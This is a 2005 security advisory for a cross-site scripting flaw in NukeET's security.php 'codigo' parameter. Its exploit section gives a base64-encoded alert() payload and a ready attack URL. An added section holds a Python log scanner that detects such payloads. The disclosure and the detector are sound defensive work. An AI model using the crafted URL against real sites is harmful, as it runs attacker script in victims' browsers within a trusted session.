################################################
NukeET 'codigo' variable cross site scripting
vendor url: http://www.truzone.org
advisory: http://lostmon.blogspot.com/2005/05/nukeet-codigo-variable-cross-site.html
Vendor confirmed: yes exploit available: yes
OSVDB ID:16214
Secunia:15332
BID:13570
Securitytracker:1013936
#################################################
NukeET contains a flaw that allows a remote cross-site scripting
attack. This flaw exists because the application does not validate
the 'codigo' variable upon submission to the 'security.php' script.
This could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server, leading to a loss
of integrity.
Bug found by Suko; investigated and reported by Lostmon.
##########
versions
##########
versions prior to 3.2 are affected
##########
solution:
##########
vendor patch
http://www.truzone.org/modules.php?name=Projet&op=getit&iddow=77
###########
timeline
###########
discovered: 9 may 2005
vendor notify: 9 may 2005
vendor response : 10 may 2005
vendor fix: 10 may 2005
disclosure: 10 may 2005
##########
exploit:
##########
The 'codigo' variable accepts base64-encoded values in the URL.
If we encode, for example:
<script>alert()</script><h1>XSS PoW@ !!!</h1>
in base64 this is:
PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+PGgxPlhTUyBQb1dAICEhITwvaDE+
If we add this base64 code to the URL, the alert and the h1 tag
are executed without any problem.
http://[victim]/security.php?codigo=PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+PGgxPlhTUyBQb1dAICEhITwvaDE+
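An added detection example, not part of the original advisory and not NukeET code: the Python below scans web access-log lines for requests to security.php, base64-decodes the 'codigo' parameter and flags values that decode to HTML or script markup. The log lines are constructed samples, and the rule that a legitimate 'codigo' value never decodes to markup is an assumption.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate 'codigo' value never decodes to HTML/script markup.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript:", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def decode_codigo(value):
    """Return the base64-decoded text of a codigo value, or None if it is not base64."""
    cleaned = value.replace(" ", "+")      # parse_qs turns a literal '+' into a space
    cleaned += "=" * (-len(cleaned) % 4)   # tolerate stripped padding
    try:
        return base64.b64decode(cleaned, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def suspicious_requests(log_lines):
    """Return [(line_number, decoded_value)] for security.php hits carrying markup."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/security.php"):
            continue
        for value in parse_qs(url.query).get("codigo", []):
            decoded = decode_codigo(value)
            if decoded and MARKUP.search(decoded):
                hits.append((number, decoded))
    return hits

# Constructed sample log lines; the second carries the encoded string from the advisory.
ADVISORY_VALUE = "PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+PGgxPlhTUyBQb1dAICEhITwvaDE+"
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2005:10:01:02 +0000] "GET /security.php?codigo=MTIzNDU2 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/May/2005:10:02:13 +0000] "GET /security.php?codigo=' + ADVISORY_VALUE + ' HTTP/1.1" 200 734',
    '203.0.113.9 - - [10/May/2005:10:02:20 +0000] "GET /index.php?codigo=' + ADVISORY_VALUE + ' HTTP/1.1" 200 100',
    '203.0.113.4 - - [10/May/2005:10:03:00 +0000] "GET /security.php?codigo=!!!notb64 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, decoded in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: codigo decodes to markup: {decoded!r}")
```

Matching on the decoded value rather than on the raw query string is what lets the check see markup that is opaque in the log.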
################ End ##################
thnx to estrella for being my light
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to Suko "patience is a virtue, little Jedi"
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what makes the mind move....